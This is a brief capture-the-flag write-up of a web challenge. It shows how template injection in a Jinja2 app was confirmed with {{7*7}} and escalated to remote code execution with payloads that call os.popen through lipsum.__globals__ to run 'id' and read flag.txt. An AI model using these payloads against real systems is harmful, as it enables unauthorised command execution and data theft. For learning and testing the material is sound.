Secret (Web)

While testing the input field, I noticed that whatever I typed into it was echoed back in the response. This is a sign that the application might be directly rendering our input inside a server-side template.

To test this hypothesis, I sent the basic SSTI payload {{7*7}}

The result came back as 49, which confirmed that our input was indeed being evaluated by a template engine — in this case, Jinja2, which is commonly used in Python web applications like Flask.

With that confirmed, the next step was to escalate from simple expression evaluation to remote code execution.

I used the following payload from PayloadAllTheThings to execute a system command:

{{ lipsum.__globals__["os"].popen('id').read() }}

This worked — the response contained the output of the id command, proving that we had RCE.

The next step was to run an ls to list files and find where the flag is stored:

This revealed the flag.txt. So, I simply ran:

{{ lipsum.__globals__["os"].popen("cat flag.txt").read() }}